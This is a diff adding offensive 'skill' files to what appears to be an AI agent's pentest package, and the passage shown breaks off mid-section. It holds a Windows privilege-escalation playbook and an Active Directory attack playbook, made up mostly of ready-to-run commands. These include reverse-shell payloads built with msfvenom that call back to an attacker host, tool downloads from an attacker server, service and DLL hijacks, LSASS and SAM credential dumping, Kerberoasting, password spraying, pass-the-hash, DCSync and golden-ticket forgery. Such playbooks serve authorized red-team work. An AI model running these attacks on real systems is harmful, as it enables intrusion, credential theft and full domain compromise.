- package/skills/offensive/airecon-fork/technologies-docker-container/SKILL.md +266 -0
- package/skills/offensive/airecon-fork/technologies-elasticsearch/SKILL.md +226 -0
- package/skills/offensive/airecon-fork/technologies-firebase-firestore/SKILL.md +213 -0
- package/skills/offensive/airecon-fork/technologies-frida-hooking/SKILL.md +387 -0
- package/skills/offensive/airecon-fork/technologies-gitlab-github/SKILL.md +259 -0
- package/skills/offensive/airecon-fork/technologies-jenkins/SKILL.md +256 -0
- package/skills/offensive/airecon-fork/technologies-kubernetes-pentest/SKILL.md +281 -0
- package/skills/offensive/airecon-fork/technologies-memcached/SKILL.md +230 -0
- package/skills/offensive/airecon-fork/technologies-mobile-app-pentesting/SKILL.md +105 -0
- package/skills/offensive/airecon-fork/technologies-mongodb/SKILL.md +257 -0
- package/skills/offensive/airecon-fork/technologies-nginx-apache/SKILL.md +280 -0
- package/skills/offensive/airecon-fork/technologies-observability-stack-attacks/SKILL.md +501 -0
- package/skills/offensive/airecon-fork/technologies-redis/SKILL.md +236 -0
- package/skills/offensive/airecon-fork/technologies-supabase/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/technologies-tomcat/SKILL.md +232 -0
- package/skills/offensive/airecon-fork/tools-advanced-fuzzing/SKILL.md +351 -0
- package/skills/offensive/airecon-fork/tools-browser-automation/SKILL.md +300 -0
- package/skills/offensive/airecon-fork/tools-caido/SKILL.md +776 -0
- package/skills/offensive/airecon-fork/tools-code-review/SKILL.md +71 -0
- package/skills/offensive/airecon-fork/tools-dalfox/SKILL.md +189 -0
- package/skills/offensive/airecon-fork/tools-hashcat-john/SKILL.md +258 -0
- package/skills/offensive/airecon-fork/tools-impacket/SKILL.md +227 -0
- package/skills/offensive/airecon-fork/tools-install/SKILL.md +202 -0
- package/skills/offensive/airecon-fork/tools-metasploit/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/tools-nmap/SKILL.md +211 -0
- package/skills/offensive/airecon-fork/tools-nuclei/SKILL.md +175 -0
- package/skills/offensive/airecon-fork/tools-reporting/SKILL.md +47 -0
- package/skills/offensive/airecon-fork/tools-scripting/SKILL.md +1939 -0
- package/skills/offensive/airecon-fork/tools-semgrep/SKILL.md +202 -0
- package/skills/offensive/airecon-fork/tools-source-audit/SKILL.md +308 -0
- package/skills/offensive/airecon-fork/tools-sqlmap/SKILL.md +137 -0
- package/skills/offensive/airecon-fork/tools-tool-catalog/SKILL.md +320 -0
- package/skills/offensive/airecon-fork/tools-wapiti/SKILL.md +293 -0
- package/skills/offensive/airecon-fork/vulnerabilities-2fa-bypass/SKILL.md +219 -0
- package/skills/offensive/airecon-fork/vulnerabilities-account-takeover/SKILL.md +223 -0
- package/skills/offensive/airecon-fork/vulnerabilities-api-schema-exposure/SKILL.md +849 -0
- package/skills/offensive/airecon-fork/vulnerabilities-api-testing/SKILL.md +278 -0
- package/skills/offensive/airecon-fork/vulnerabilities-auth-workflow/SKILL.md +252 -0
- package/skills/offensive/airecon-fork/vulnerabilities-authentication-jwt/SKILL.md +158 -0
- package/skills/offensive/airecon-fork/vulnerabilities-bfla/SKILL.md +156 -0
- package/skills/offensive/airecon-fork/vulnerabilities-blind-xss/SKILL.md +111 -0
- package/skills/offensive/airecon-fork/vulnerabilities-business-logic/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-cors/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-crlf-injection/SKILL.md +146 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf/SKILL.md +200 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf-advanced-bypass/SKILL.md +536 -0
- package/skills/offensive/airecon-fork/vulnerabilities-deserialization/SKILL.md +363 -0
- package/skills/offensive/airecon-fork/vulnerabilities-dom-based-vulnerabilities/SKILL.md +105 -0
- package/skills/offensive/airecon-fork/vulnerabilities-exploitation/SKILL.md +286 -0
- package/skills/offensive/airecon-fork/vulnerabilities-grpc/SKILL.md +123 -0
- package/skills/offensive/airecon-fork/vulnerabilities-host-header-injection/SKILL.md +169 -0
- package/skills/offensive/airecon-fork/vulnerabilities-http-smuggling/SKILL.md +411 -0
- package/skills/offensive/airecon-fork/vulnerabilities-idor/SKILL.md +705 -0
- package/skills/offensive/airecon-fork/vulnerabilities-information-disclosure/SKILL.md +867 -0
- package/skills/offensive/airecon-fork/vulnerabilities-insecure-file-uploads/SKILL.md +190 -0
- package/skills/offensive/airecon-fork/vulnerabilities-jwt-attacks/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/vulnerabilities-kubernetes/SKILL.md +252 -0
- package/skills/offensive/airecon-fork/vulnerabilities-mass-assignment/SKILL.md +788 -0
- package/skills/offensive/airecon-fork/vulnerabilities-nosql-injection/SKILL.md +204 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-misconfig/SKILL.md +220 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-saml/SKILL.md +163 -0
- package/skills/offensive/airecon-fork/vulnerabilities-open-redirect/SKILL.md +167 -0
- package/skills/offensive/airecon-fork/vulnerabilities-password-reset-poisoning/SKILL.md +66 -0
- package/skills/offensive/airecon-fork/vulnerabilities-path-traversal/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-privilege-escalation/SKILL.md +320 -0
- package/skills/offensive/airecon-fork/vulnerabilities-prototype-pollution/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-race-conditions/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-rce/SKILL.md +240 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sensitive-file-pii-exposure/SKILL.md +589 -0
- package/skills/offensive/airecon-fork/vulnerabilities-spring4shell/SKILL.md +86 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sql-injection/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssrf/SKILL.md +183 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssti/SKILL.md +344 -0
- package/skills/offensive/airecon-fork/vulnerabilities-subdomain-takeover/SKILL.md +160 -0
- package/skills/offensive/airecon-fork/vulnerabilities-supply-chain/SKILL.md +125 -0
- package/skills/offensive/airecon-fork/vulnerabilities-unhandled-exception-differential/SKILL.md +742 -0
- package/skills/offensive/airecon-fork/vulnerabilities-waf-detection/SKILL.md +90 -0
- package/skills/offensive/airecon-fork/vulnerabilities-web-cache-poisoning/SKILL.md +233 -0
- package/skills/offensive/airecon-fork/vulnerabilities-websocket/SKILL.md +180 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xss/SKILL.md +316 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xxe/SKILL.md +222 -0
- package/skills/offensive/matty-fork/cicd-redteam/SKILL.md +531 -0
- package/skills/offensive/matty-fork/cloud-security/SKILL.md +106 -0
- package/skills/offensive/matty-fork/container-escape/SKILL.md +174 -0
- package/skills/offensive/matty-fork/mobile-pentester/SKILL.md +357 -0
- package/skills/offensive/matty-fork/subdomain-takeover/SKILL.md +154 -0
- package/skills/osint/elementalsouls-fork/offensive-osint/README.md +92 -0
- package/skills/osint/elementalsouls-fork/offensive-osint/SKILL.md +4177 -0
- package/skills/osint/elementalsouls-fork/osint-methodology/README.md +66 -0
- package/skills/osint/elementalsouls-fork/osint-methodology/SKILL.md +1695 -0
|
@@ -0,0 +1,210 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
---
|
|
4
|
+
name: windows-privesc
|
|
5
|
+
description: Windows privilege escalation — AlwaysInstallElevated, unquoted service paths, weak service permissions, token impersonation, SeImpersonatePrivilege, winpeas, and credential dumping
|
|
6
|
+
---
|
|
7
|
+
|
|
8
|
+
# Windows Privilege Escalation
|
|
9
|
+
|
|
10
|
+
Goal: low-privilege user → SYSTEM/Administrator. Enumerate first, exploit second.
|
|
11
|
+
|
|
12
|
+
**Tools (transfer to target or use from SMB share):**
|
|
13
|
+
```
|
|
14
|
+
# WinPEAS: download winpeas.exe to /home/pentester/tools/
|
|
15
|
+
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASx64.exe -O /home/pentester/tools/winpeas.exe
|
|
16
|
+
# PowerUp: included in PowerSploit
|
|
17
|
+
# SharpUp: .NET alternative
|
|
18
|
+
# Serve via Python HTTP: python3 -m http.server 8000 --directory /home/pentester/tools/
|
|
19
|
+
```
|
|
20
|
+
|
|
21
|
+
---
|
|
22
|
+
|
|
23
|
+
## Automated Enumeration — Start Here
|
|
24
|
+
|
|
25
|
+
# Transfer and run winpeas:
|
|
26
|
+
# From attacker: python3 -m http.server 8000 --directory /home/pentester/tools/
|
|
27
|
+
# On target (cmd):
|
|
28
|
+
certutil -urlcache -f http://<attacker>:8000/winpeas.exe C:\Temp\winpeas.exe
|
|
29
|
+
C:\Temp\winpeas.exe
|
|
30
|
+
|
|
31
|
+
# PowerShell download:
|
|
32
|
+
(New-Object Net.WebClient).DownloadFile('http://<attacker>:8000/winpeas.exe','C:\Temp\winpeas.exe')
|
|
33
|
+
|
|
34
|
+
# Manual initial checks (cmd):
|
|
35
|
+
whoami /priv # Privileges
|
|
36
|
+
whoami /groups # Group memberships
|
|
37
|
+
net user <username> # User info
|
|
38
|
+
net localgroup administrators # Local admins
|
|
39
|
+
|
|
40
|
+
---
|
|
41
|
+
|
|
42
|
+
## Token Impersonation — SeImpersonatePrivilege
|
|
43
|
+
|
|
44
|
+
Most common privesc on Windows services (IIS, SQL Server, etc.):
|
|
45
|
+
|
|
46
|
+
# Check if you have SeImpersonatePrivilege:
|
|
47
|
+
whoami /priv
|
|
48
|
+
# SeImpersonatePrivilege = Enabled → potato attacks work
|
|
49
|
+
|
|
50
|
+
# Potato attacks (escalate to SYSTEM):
|
|
51
|
+
|
|
52
|
+
# PrintSpoofer (Windows 10/2019+):
|
|
53
|
+
# wget https://github.com/itm4n/PrintSpoofer/releases/latest/download/PrintSpoofer64.exe
|
|
54
|
+
PrintSpoofer64.exe -i -c cmd
|
|
55
|
+
PrintSpoofer64.exe -c "powershell -enc <base64_revshell>"
|
|
56
|
+
|
|
57
|
+
# GodPotato (most universal — works on Server 2012-2022):
|
|
58
|
+
# wget https://github.com/BeichenDream/GodPotato/releases/latest/download/GodPotato-NET4.exe
|
|
59
|
+
GodPotato-NET4.exe -cmd "cmd /c whoami"
|
|
60
|
+
GodPotato-NET4.exe -cmd "powershell -enc <base64_revshell>"
|
|
61
|
+
|
|
62
|
+
# JuicyPotato (older Windows, <Server 2019):
|
|
63
|
+
# wget https://github.com/ohpe/juicy-potato/releases/latest/download/JuicyPotato.exe
|
|
64
|
+
JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c powershell -enc <payload>" -t * -c {CLSID}
|
|
65
|
+
# CLSIDs: https://github.com/ohpe/juicy-potato/tree/master/CLSID
|
|
66
|
+
|
|
67
|
+
---
|
|
68
|
+
|
|
69
|
+
## AlwaysInstallElevated
|
|
70
|
+
|
|
71
|
+
MSI files install as SYSTEM if this registry key is set:
|
|
72
|
+
|
|
73
|
+
# Check registry:
|
|
74
|
+
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
|
75
|
+
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
|
76
|
+
# Both must be 1 for exploitation
|
|
77
|
+
|
|
78
|
+
# Create malicious MSI (from attacker Kali):
|
|
79
|
+
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker> LPORT=4444 -f msi -o priv.msi
|
|
80
|
+
|
|
81
|
+
# Install on target:
|
|
82
|
+
msiexec /quiet /qn /i C:\Temp\priv.msi
|
|
83
|
+
|
|
84
|
+
---
|
|
85
|
+
|
|
86
|
+
## Unquoted Service Paths
|
|
87
|
+
|
|
88
|
+
If a service binary path has spaces and no quotes, Windows tries multiple path interpretations:
|
|
89
|
+
|
|
90
|
+
# Find unquoted paths:
|
|
91
|
+
wmic service get name,pathname,displayname,startmode | findstr /i "auto" | findstr /iv "c:\windows\\" | findstr /iv """
|
|
92
|
+
# OR:
|
|
93
|
+
sc qc <service_name> # Check individual service
|
|
94
|
+
|
|
95
|
+
# Example: C:\Program Files\Vulnerable Service\service.exe
|
|
96
|
+
# Windows tries: C:\Program.exe → C:\Program Files\Vulnerable.exe → C:\Program Files\Vulnerable Service\service.exe
|
|
97
|
+
# Place malicious binary at first writable location:
|
|
98
|
+
# Check write permissions:
|
|
99
|
+
icacls "C:\Program Files\Vulnerable Service"
|
|
100
|
+
# If writable: drop service.exe there
|
|
101
|
+
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker> LPORT=4444 -f exe -o "C:\Program Files\Vulnerable.exe"
|
|
102
|
+
# Restart service:
|
|
103
|
+
sc stop "VulnService" && sc start "VulnService"
|
|
104
|
+
|
|
105
|
+
---
|
|
106
|
+
|
|
107
|
+
## Weak Service Permissions
|
|
108
|
+
|
|
109
|
+
# Check service permissions:
|
|
110
|
+
accesschk.exe -wuvc Everyone * # Services writable by Everyone
|
|
111
|
+
accesschk.exe -wuvc "Authenticated Users" *
|
|
112
|
+
# Download accesschk: https://learn.microsoft.com/sysinternals/downloads/accesschk
|
|
113
|
+
|
|
114
|
+
# If service is writable, change its binary path:
|
|
115
|
+
sc config <service_name> binPath= "cmd.exe /c net localgroup administrators <user> /add"
|
|
116
|
+
sc start <service_name>
|
|
117
|
+
# OR: reverse shell:
|
|
118
|
+
sc config <service_name> binPath= "C:\Temp\shell.exe"
|
|
119
|
+
sc start <service_name>
|
|
120
|
+
|
|
121
|
+
---
|
|
122
|
+
|
|
123
|
+
## DLL Hijacking
|
|
124
|
+
|
|
125
|
+
Windows searches for DLLs in a specific order — place malicious DLL first:
|
|
126
|
+
|
|
127
|
+
# Find missing DLLs (from Procmon on dev machine, or:)
|
|
128
|
+
# Check applications that run as SYSTEM and load DLLs from writable directories
|
|
129
|
+
|
|
130
|
+
# Create malicious DLL (Kali):
|
|
131
|
+
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker> LPORT=4444 -f dll -o hijack.dll
|
|
132
|
+
|
|
133
|
+
# Place in application directory if writable, then restart service
|
|
134
|
+
|
|
135
|
+
---
|
|
136
|
+
|
|
137
|
+
## Credential Extraction
|
|
138
|
+
|
|
139
|
+
# Dump SAM database (requires SYSTEM/Admin):
|
|
140
|
+
reg save HKLM\SAM C:\Temp\SAM
|
|
141
|
+
reg save HKLM\SYSTEM C:\Temp\SYSTEM
|
|
142
|
+
# Transfer to Kali:
|
|
143
|
+
secretsdump.py LOCAL -sam SAM -system SYSTEM
|
|
144
|
+
|
|
145
|
+
# secretsdump.py remotely (from Kali with admin creds):
|
|
146
|
+
secretsdump.py administrator:password@<target>
|
|
147
|
+
secretsdump.py -hashes :<NTLM> administrator@<target>
|
|
148
|
+
|
|
149
|
+
# LSASS memory dump (requires SeDebugPrivilege / Admin):
|
|
150
|
+
# Method 1: Task Manager → lsass.exe → Create dump file
|
|
151
|
+
# Method 2: Via cmd:
|
|
152
|
+
procdump64.exe -ma lsass.exe lsass.dmp
|
|
153
|
+
# Method 3: comsvcs.dll (no tools needed):
|
|
154
|
+
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass_PID> C:\Temp\lsass.dmp full
|
|
155
|
+
# Transfer to Kali and parse:
|
|
156
|
+
pypykatz lsa minidump lsass.dmp
|
|
157
|
+
# pip install pypykatz --break-system-packages
|
|
158
|
+
|
|
159
|
+
---
|
|
160
|
+
|
|
161
|
+
## Scheduled Tasks
|
|
162
|
+
|
|
163
|
+
# List all scheduled tasks:
|
|
164
|
+
schtasks /query /fo LIST /v | findstr /i "task name\|run as\|task to run"
|
|
165
|
+
# Look for: tasks running as SYSTEM with writable binary paths
|
|
166
|
+
|
|
167
|
+
# Modify task binary (if writable):
|
|
168
|
+
schtasks /change /tn "<task_name>" /ru SYSTEM /tr "C:\Temp\shell.exe"
|
|
169
|
+
|
|
170
|
+
---
|
|
171
|
+
|
|
172
|
+
## Stored Credentials
|
|
173
|
+
|
|
174
|
+
# Windows Credential Manager:
|
|
175
|
+
cmdkey /list
|
|
176
|
+
runas /savecred /user:administrator cmd.exe # If saved creds exist
|
|
177
|
+
|
|
178
|
+
# Unattend.xml (sometimes contains plaintext passwords):
|
|
179
|
+
type C:\Windows\Panther\Unattend.xml
|
|
180
|
+
type C:\Windows\Panther\Unattend\Unattend.xml
|
|
181
|
+
type C:\Windows\System32\sysprep\sysprep.xml
|
|
182
|
+
|
|
183
|
+
# PowerShell history:
|
|
184
|
+
type C:\Users\<user>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
|
|
185
|
+
|
|
186
|
+
# Registry saved credentials:
|
|
187
|
+
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
|
|
188
|
+
# Look for: AutoAdminLogon, DefaultUserName, DefaultPassword
|
|
189
|
+
|
|
190
|
+
---
|
|
191
|
+
|
|
192
|
+
## Pro Tips
|
|
193
|
+
|
|
194
|
+
1. SeImpersonatePrivilege = almost guaranteed SYSTEM via GodPotato (works on most modern Windows)
|
|
195
|
+
2. `whoami /priv` first — enabled privileges determine available attack paths
|
|
196
|
+
3. AlwaysInstallElevated = two registry keys must both be 1 — check BOTH HKLM and HKCU
|
|
197
|
+
4. Unquoted service paths need a writable directory in the path — check `icacls` on each directory
|
|
198
|
+
5. `secretsdump.py` remotely = no tools needed on target, extract all NTLM hashes from Kali
|
|
199
|
+
6. PowerShell history often contains passwords typed as arguments — always check
|
|
200
|
+
|
|
201
|
+
## Summary
|
|
202
|
+
|
|
203
|
+
Windows privesc checklist:
|
|
204
|
+
1. `whoami /priv` → SeImpersonatePrivilege → GodPotato/PrintSpoofer
|
|
205
|
+
2. `winpeas.exe` → automated full enumeration
|
|
206
|
+
3. AlwaysInstallElevated → malicious MSI
|
|
207
|
+
4. Unquoted service paths → drop binary
|
|
208
|
+
5. Weak service permissions → `accesschk` → `sc config binPath`
|
|
209
|
+
6. `secretsdump.py` → dump all NTLM hashes
|
|
210
|
+
7. Stored credentials in registry, Unattend.xml, PS history
|
|
@@ -0,0 +1,314 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
---
|
|
4
|
+
name: active-directory
|
|
5
|
+
description: Active Directory attack techniques covering enumeration, Kerberoasting, AS-REP Roasting, Pass-the-Hash, DCSync, ADCS ESC attacks, and ACL abuse
|
|
6
|
+
---
|
|
7
|
+
|
|
8
|
+
# Active Directory Attacks
|
|
9
|
+
|
|
10
|
+
AD is the most common enterprise authentication backbone. Compromise follows a pattern: enumerate → credential attack → lateral movement → domain escalation. Most paths lead to DCSync or a Golden Ticket.
|
|
11
|
+
|
|
12
|
+
---
|
|
13
|
+
|
|
14
|
+
## Enumeration (Unauthenticated)
|
|
15
|
+
|
|
16
|
+
### Network Discovery
|
|
17
|
+
|
|
18
|
+
# Find DCs
|
|
19
|
+
nmap -p 88,389,445,636,3268,3269 <subnet> --open -oA output/ad_scan
|
|
20
|
+
nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>
|
|
21
|
+
|
|
22
|
+
# LDAP anonymous query
|
|
23
|
+
ldapsearch -H ldap://<dc_ip> -x -s base namingcontexts
|
|
24
|
+
ldapsearch -H ldap://<dc_ip> -x -b "dc=domain,dc=com" -s sub "(objectclass=*)"
|
|
25
|
+
|
|
26
|
+
# SMB null session
|
|
27
|
+
smbclient -L //<dc_ip> -N
|
|
28
|
+
enum4linux-ng -A <dc_ip>
|
|
29
|
+
netexec smb <subnet>/24 --gen-relay-list output/relay_targets.txt
|
|
30
|
+
|
|
31
|
+
---
|
|
32
|
+
|
|
33
|
+
## Enumeration (Authenticated)
|
|
34
|
+
|
|
35
|
+
### BloodHound
|
|
36
|
+
|
|
37
|
+
# SharpHound collector (Windows)
|
|
38
|
+
.\SharpHound.exe -c All --zipfilename output.zip
|
|
39
|
+
|
|
40
|
+
# BloodHound.py (Linux — remote collection)
|
|
41
|
+
bloodhound-python -u <user> -p <pass> -d <domain> -ns <dc_ip> -c All
|
|
42
|
+
# Or with NTLM hash:
|
|
43
|
+
bloodhound-python -u <user> --hashes :<ntlm_hash> -d <domain> -ns <dc_ip> -c All
|
|
44
|
+
|
|
45
|
+
# Import JSON to BloodHound and look for:
|
|
46
|
+
# - Shortest path to Domain Admin
|
|
47
|
+
# - Users with DCSync rights
|
|
48
|
+
# - Kerberoastable users
|
|
49
|
+
# - AS-REP Roastable users
|
|
50
|
+
|
|
51
|
+
### PowerView / ldapsearch Queries
|
|
52
|
+
|
|
53
|
+
# Users and groups
|
|
54
|
+
Get-DomainUser | select name,description,memberof,lastlogon
|
|
55
|
+
Get-DomainGroup -Identity "Domain Admins" | select member
|
|
56
|
+
Get-DomainGroupMember "Domain Admins"
|
|
57
|
+
|
|
58
|
+
# Kerberoastable accounts (SPN set)
|
|
59
|
+
Get-DomainUser -SPN | select name,serviceprincipalname
|
|
60
|
+
ldapsearch -H ldap://<dc> -D "<user>@<domain>" -w <pass> -b "dc=domain,dc=com" \
|
|
61
|
+
"(&(objectCategory=user)(servicePrincipalName=*))" sAMAccountName servicePrincipalName
|
|
62
|
+
|
|
63
|
+
# AS-REP Roastable (no preauth required)
|
|
64
|
+
Get-DomainUser -PreauthNotRequired | select name
|
|
65
|
+
ldapsearch -H ldap://<dc> -b "dc=domain,dc=com" \
|
|
66
|
+
"(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" sAMAccountName
|
|
67
|
+
|
|
68
|
+
# Password policy (lockout threshold)
|
|
69
|
+
Get-DomainPolicy | select -ExpandProperty SystemAccess
|
|
70
|
+
|
|
71
|
+
---
|
|
72
|
+
|
|
73
|
+
## Credential Attacks
|
|
74
|
+
|
|
75
|
+
### Kerberoasting
|
|
76
|
+
|
|
77
|
+
Request service tickets for SPN accounts → offline crack:
|
|
78
|
+
|
|
79
|
+
# impacket (Linux)
|
|
80
|
+
impacket-GetUserSPNs <domain>/<user>:<pass> -dc-ip <dc_ip> -request -outputfile output/kerberoast.txt
|
|
81
|
+
|
|
82
|
+
# Rubeus (Windows)
|
|
83
|
+
.\Rubeus.exe kerberoast /outfile:kerberoast.txt
|
|
84
|
+
|
|
85
|
+
# Crack with hashcat
|
|
86
|
+
hashcat -m 13100 output/kerberoast.txt /usr/share/wordlists/rockyou.txt --force
|
|
87
|
+
|
|
88
|
+
### AS-REP Roasting
|
|
89
|
+
|
|
90
|
+
No pre-auth = get encrypted TGT without credentials:
|
|
91
|
+
|
|
92
|
+
# impacket (no credentials needed)
|
|
93
|
+
impacket-GetNPUsers <domain>/ -usersfile output/users.txt -dc-ip <dc_ip> -no-pass -format hashcat \
|
|
94
|
+
-outputfile output/asrep.txt
|
|
95
|
+
|
|
96
|
+
# With credentials (enumerate no-preauth users automatically)
|
|
97
|
+
impacket-GetNPUsers <domain>/<user>:<pass> -dc-ip <dc_ip> -request -format hashcat
|
|
98
|
+
|
|
99
|
+
# Crack
|
|
100
|
+
hashcat -m 18200 output/asrep.txt /usr/share/wordlists/rockyou.txt
|
|
101
|
+
|
|
102
|
+
### Password Spraying
|
|
103
|
+
|
|
104
|
+
# netexec (formerly CrackMapExec)
|
|
105
|
+
netexec smb <dc_ip> -u output/users.txt -p 'Password123!' --continue-on-success
|
|
106
|
+
netexec smb <dc_ip> -u output/users.txt -p output/passwords.txt --no-brute
|
|
107
|
+
|
|
108
|
+
# Kerbrute (Kerberos-based, no lockout indicator difference)
|
|
109
|
+
kerbrute passwordspray -d <domain> --dc <dc_ip> output/users.txt 'Password123!'
|
|
110
|
+
|
|
111
|
+
### LLMNR/NBT-NS Poisoning (Responder)
|
|
112
|
+
|
|
113
|
+
# Capture NTLMv2 hashes from broadcast traffic
|
|
114
|
+
responder -I eth0 -wv
|
|
115
|
+
|
|
116
|
+
# Relay captured hashes (no SMB signing)
|
|
117
|
+
netexec smb output/relay_targets.txt --gen-relay-list output/nosign.txt
|
|
118
|
+
impacket-ntlmrelayx -tf output/nosign.txt -smb2support -socks
|
|
119
|
+
|
|
120
|
+
# Crack captured NTLMv2:
|
|
121
|
+
hashcat -m 5600 output/captured.txt /usr/share/wordlists/rockyou.txt
|
|
122
|
+
|
|
123
|
+
---
|
|
124
|
+
|
|
125
|
+
## Lateral Movement
|
|
126
|
+
|
|
127
|
+
### Pass-the-Hash
|
|
128
|
+
|
|
129
|
+
# impacket suite
|
|
130
|
+
impacket-psexec <domain>/<user>@<target_ip> -hashes :<ntlm_hash>
|
|
131
|
+
impacket-wmiexec <domain>/<user>@<target_ip> -hashes :<ntlm_hash>
|
|
132
|
+
impacket-smbexec <domain>/<user>@<target_ip> -hashes :<ntlm_hash>
|
|
133
|
+
|
|
134
|
+
# netexec
|
|
135
|
+
netexec smb <target_ip> -u <user> -H <ntlm_hash> -x "whoami"
|
|
136
|
+
|
|
137
|
+
### Pass-the-Ticket
|
|
138
|
+
|
|
139
|
+
# Rubeus — extract and inject TGT
|
|
140
|
+
.\Rubeus.exe triage
|
|
141
|
+
.\Rubeus.exe dump /luid:<luid> /nowrap
|
|
142
|
+
.\Rubeus.exe ptt /ticket:<base64_ticket>
|
|
143
|
+
|
|
144
|
+
# impacket — use .ccache file
|
|
145
|
+
export KRB5CCNAME=ticket.ccache
|
|
146
|
+
impacket-psexec <user>@<target> -k -no-pass
|
|
147
|
+
|
|
148
|
+
### Overpass-the-Hash (NTLM → Kerberos TGT)
|
|
149
|
+
|
|
150
|
+
# Rubeus
|
|
151
|
+
.\Rubeus.exe asktgt /user:<user> /rc4:<ntlm_hash> /ptt
|
|
152
|
+
|
|
153
|
+
# impacket
|
|
154
|
+
impacket-getTGT <domain>/<user> -hashes :<ntlm_hash>
|
|
155
|
+
export KRB5CCNAME=<user>.ccache
|
|
156
|
+
impacket-psexec <user>@<dc> -k -no-pass
|
|
157
|
+
|
|
158
|
+
---
|
|
159
|
+
|
|
160
|
+
## Domain Escalation
|
|
161
|
+
|
|
162
|
+
### DCSync (requires Domain Replication rights)
|
|
163
|
+
|
|
164
|
+
Mimics domain controller replication to extract all password hashes:
|
|
165
|
+
|
|
166
|
+
# impacket (Linux)
|
|
167
|
+
impacket-secretsdump <domain>/<user>:<pass>@<dc_ip> -just-dc
|
|
168
|
+
impacket-secretsdump <domain>/<user>@<dc_ip> -hashes :<ntlm_hash> -just-dc-user Administrator
|
|
169
|
+
|
|
170
|
+
# Mimikatz (Windows)
|
|
171
|
+
lsadump::dcsync /domain:<domain> /user:krbtgt
|
|
172
|
+
lsadump::dcsync /domain:<domain> /all /csv
|
|
173
|
+
|
|
174
|
+
### Golden Ticket
|
|
175
|
+
|
|
176
|
+
With krbtgt hash, forge TGT for any user/group:
|
|
177
|
+
|
|
178
|
+
# Get krbtgt hash via DCSync first:
|
|
179
|
+
impacket-secretsdump <domain>/Administrator@<dc_ip> -just-dc-user krbtgt
|
|
180
|
+
|
|
181
|
+
# Forge Golden Ticket (Mimikatz)
|
|
182
|
+
kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> \
|
|
183
|
+
/krbtgt:<krbtgt_hash> /ptt
|
|
184
|
+
|
|
185
|
+
# impacket
|
|
186
|
+
impacket-ticketer -nthash <krbtgt_hash> -domain-sid <sid> -domain <domain> Administrator
|
|
187
|
+
export KRB5CCNAME=Administrator.ccache
|
|
188
|
+
impacket-psexec Administrator@<dc> -k -no-pass
|
|
189
|
+
|
|
190
|
+
### Silver Ticket
|
|
191
|
+
|
|
192
|
+
Forge service ticket for specific service using service account's hash:
|
|
193
|
+
|
|
194
|
+
impacket-ticketer -nthash <service_hash> -domain-sid <sid> -domain <domain> \
|
|
195
|
+
-spn cifs/<target_host> -user-id 500 Administrator
|
|
196
|
+
|
|
197
|
+
### ACL Abuse
|
|
198
|
+
|
|
199
|
+
BloodHound reveals ACL edges. Key abusable permissions:
|
|
200
|
+
|
|
201
|
+
# WriteDACL over a user → give yourself GenericAll
|
|
202
|
+
Add-DomainObjectAcl -TargetIdentity <target_user> -PrincipalIdentity <your_user> -Rights All
|
|
203
|
+
|
|
204
|
+
# GenericAll over a user → reset password
|
|
205
|
+
Set-DomainUserPassword -Identity <target_user> -AccountPassword (ConvertTo-SecureString "NewPass123!" -AsPlainText -Force)
|
|
206
|
+
|
|
207
|
+
# GenericAll over a group → add yourself
|
|
208
|
+
Add-DomainGroupMember -Identity "Domain Admins" -Members <your_user>
|
|
209
|
+
|
|
210
|
+
# WriteOwner → change ownership → WriteDACL → GenericAll
|
|
211
|
+
Set-DomainObjectOwner -Identity <target> -OwnerIdentity <your_user>
|
|
212
|
+
|
|
213
|
+
---
|
|
214
|
+
|
|
215
|
+
## ADCS (Active Directory Certificate Services)
|
|
216
|
+
|
|
217
|
+
Check if ADCS is deployed:
|
|
218
|
+
|
|
219
|
+
certutil -config - -ping
|
|
220
|
+
netexec ldap <dc_ip> -u <user> -p <pass> -M adcs
|
|
221
|
+
|
|
222
|
+
### ESC1 — SAN Injection
|
|
223
|
+
|
|
224
|
+
Enrollment allows specifying Subject Alternative Name → request cert as any user:
|
|
225
|
+
|
|
226
|
+
# Find vulnerable templates
|
|
227
|
+
certipy find -u <user>@<domain> -p <pass> -dc-ip <dc_ip> -vulnerable
|
|
228
|
+
|
|
229
|
+
# Exploit ESC1
|
|
230
|
+
